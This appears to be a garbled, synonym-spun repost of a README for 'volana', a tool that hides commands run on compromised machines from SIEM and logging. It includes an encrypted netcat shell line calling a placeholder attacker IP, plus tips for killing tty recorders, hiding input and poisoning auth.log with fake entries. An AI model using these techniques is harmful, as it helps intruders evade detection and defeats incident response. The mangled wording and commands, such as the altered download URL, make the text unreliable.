Shell command obfuscation to keep away from SIEM/detection system
Throughout pentest, an vital side is to be stealth. Because of this you must clear your tracks after your passage. Nonetheless, many infrastructures log command and ship them to a SIEM in an actual time making the afterwards cleansing half alone ineffective.
volana
present a easy technique to conceal instructions executed on compromised machine by offering it self shell runtime (enter your command, volana executes for you). Like this you clear your tracks DURING your passage
Utilization
It’s essential get an interactive shell. (Discover a technique to spawn it, you’re a hacker, it is your job ! in any other case). Then obtain it heading in the right direction machine and launch it. that is it, now you possibly can sort the command you need to be stealthy executed
## Obtain it from github launch
## When you shouldn't have web entry from compromised machine, discover one other manner
curl -lO -L https://github.com/ariary/volana/releases/newest/obtain/volana## Execute it
./volana
## You at the moment are beneath the radar
volana » echo "Hello SIEM workforce! Do you discover me?" > /dev/null 2>&1 #you might be allowed to be a bit cocky
volana » [command]
Key phrase for volana console: * ring
: allow ring mode ie every command is launched with lots others to cowl tracks (from answer that monitor system name) * exit
: exit volana console
from non interactive shell
Think about you will have a non interactive shell (webshell or blind rce), you possibly can use encrypt
and decrypt
subcommand. Beforehand, you should construct volana
with embedded encryption key.
On attacker machine
## Construct volana with encryption key
make construct.volana-with-encryption## Switch it on TARGET (the distinctive detectable command)
## [...]
## Encrypt the command you need to stealthy execute
## (Right here a nc bindshell to acquire a interactive shell)
volana encr "nc [attacker_ip] [attacker_port] -e /bin/bash"
>>> ENCRYPTED COMMAND
Copy encrypted command and executed it along with your rce heading in the right direction machine
./volana decr [encrypted_command]
## Now you will have a bindshell, spawn it to make it interactive and use volana normally to be stealth (./volana). + Do not forget to take away volana binary earlier than leaving (trigger decryption key can simply be retrieved from it)
Why not simply conceal command with echo [command] | base64
? And decode heading in the right direction with echo [encoded_command] | base64 -d | bash
As a result of we need to be protected towards programs that set off alert for base64
use or that search base64 textual content in command. Additionally we need to make investigation troublesome and base64 is not an actual brake.
Detection
Remember the fact that volana
isn’t a miracle that can make you completely invisible. Its goal is to make intrusion detection and investigation tougher.
By detected we imply if we’re in a position to set off an alert if a sure command has been executed.
Conceal from
Solely the volana
launching command line will likely be catched. 🧠 Nevertheless, by including an area earlier than executing it, the default bash conduct is to not reserve it
- Detection programs which can be primarily based on historical past command output
- Detection programs which can be primarily based on historical past information
.bash_history
, “.zsh_history” and so on ..- Detection programs which can be primarily based on bash debug traps
- Detection programs which can be primarily based on sudo built-in logging system
- Detection programs tracing all processes syscall system-wide (eg
opensnoop
) - Terminal (tty) recorder (
script
,display screen -L
,sexonthebash
,ovh-ttyrec
, and so on..) - Straightforward to detect & keep away from:
pkill -9 script
- Not a standard case
display screen
is a little more troublesome to keep away from, nonetheless it doesn’t register enter (secret enter:stty -echo
=> keep away from)- Command detection Could possibly be keep away from with
volana
with encryption
Seen for
- Detection programs which have alert for unknown command (volana one)
- Detection programs which can be primarily based on keylogger
- Straightforward to keep away from: copy/previous instructions
- Not a standard case
- Detection programs which can be primarily based on syslog information (e.g.
/var/log/auth.log
) - Just for
sudo
orsu
instructions - syslog file could possibly be modified and thus be poisoned as you would like (e.g for /var/log/auth.log:
logger -p auth.information "No hacker is poisoning your syslog answer, don't fret"
) - Detection programs which can be primarily based on syscall (eg auditd,LKML/eBPF)
- Troublesome to research, could possibly be make unreadable by making a number of diversion syscalls
- Customized
LD_PRELOAD
injection to make log - Not a standard case in any respect
Bug bounty
Sorry for the clickbait title, however no cash will likely be supplied for contibutors. 🐛
Let me know if in case you have discovered: * a technique to detect volana
* a technique to spy console that do not detect volana
instructions * a technique to keep away from a detection system
Credit score